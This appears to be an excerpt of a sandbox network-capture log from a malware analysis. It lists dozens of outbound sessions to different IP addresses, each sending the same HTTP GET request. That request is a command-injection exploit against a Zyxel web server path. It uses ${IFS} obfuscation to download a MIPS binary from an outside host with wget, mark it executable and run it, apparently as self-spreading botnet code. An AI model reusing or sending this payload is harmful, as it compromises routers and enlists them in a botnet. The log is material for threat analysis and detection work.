                                    Jan 13, 2024 19:02:28.043096066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2956192.168.2.1337774182.38.119.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043190002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2957192.168.2.1340812208.90.168.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043230057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2958192.168.2.134039862.225.18.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043298006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2959192.168.2.134228663.7.160.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043365002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2960192.168.2.1339716175.155.84.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043443918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2961192.168.2.1337568184.243.214.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043504000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2962192.168.2.1357224195.167.252.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043566942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2963192.168.2.1356134219.32.190.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043610096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2964192.168.2.1356676173.234.239.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043651104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2965192.168.2.135881475.229.146.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043710947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2966192.168.2.134521237.87.186.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043760061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2967192.168.2.1340106193.238.189.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043837070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2968192.168.2.1353844158.128.37.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043898106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2969192.168.2.134232683.15.194.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.043977022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2970192.168.2.1335504128.133.246.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044027090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2971192.168.2.1336530100.22.61.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044068098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2972192.168.2.133905214.240.237.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044126034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2973192.168.2.135071275.1.184.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044207096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2974192.168.2.133747444.125.106.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044262886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2975192.168.2.13391305.248.236.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044346094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2976192.168.2.1343216165.126.248.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044409037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2977192.168.2.1336424103.43.86.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044446945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2978192.168.2.1354128170.43.74.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044512033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2979192.168.2.1333212126.39.124.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044574022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2980192.168.2.136055682.106.96.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044631004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2981192.168.2.1352010118.21.74.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044675112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2982192.168.2.135763444.83.225.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044740915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2983192.168.2.134168434.53.151.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044785023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2984192.168.2.134285685.208.123.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044858932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2985192.168.2.1359792158.224.243.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044948101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2986192.168.2.134853646.152.117.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.044976950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2987192.168.2.135770853.242.138.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045037031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2988192.168.2.134054868.141.215.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045089960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2989192.168.2.1335132114.9.39.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045160055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2990192.168.2.133623494.239.89.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045211077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2991192.168.2.1347018126.237.64.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045295000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2992192.168.2.13415621.236.113.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045337915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2993192.168.2.1343236188.145.69.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045409918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2994192.168.2.1348648150.35.203.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045459032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2995192.168.2.1335246132.176.232.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045521975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2996192.168.2.1359098108.92.215.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045562983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2997192.168.2.135716685.245.89.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045659065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2998192.168.2.1351314111.197.103.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045712948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2999192.168.2.1359166220.106.190.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045757055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3000192.168.2.1345608120.73.254.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045821905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3001192.168.2.135838832.190.223.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045870066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3002192.168.2.135178495.32.187.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045931101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3003192.168.2.1348944196.242.205.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.045994043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3004192.168.2.1351716143.138.69.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046042919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3005192.168.2.134793854.196.143.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046099901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3006192.168.2.135133019.50.126.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046169996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3007192.168.2.1342276177.156.179.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046224117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3008192.168.2.1333278109.156.221.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046282053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3009192.168.2.134511878.7.229.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046335936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3010192.168.2.1334930130.133.232.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046375990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3011192.168.2.134580091.11.84.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046437979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3012192.168.2.1358672199.172.160.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046472073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3013192.168.2.1350308164.210.12.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046551943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3014192.168.2.13415284.99.18.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046607018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3015192.168.2.134721861.63.223.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046638966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3016192.168.2.1351540212.164.130.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046710968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3017192.168.2.135988427.129.125.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046765089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3018192.168.2.135044867.17.182.9443
                                    TimestampBytes transferredDirectionData
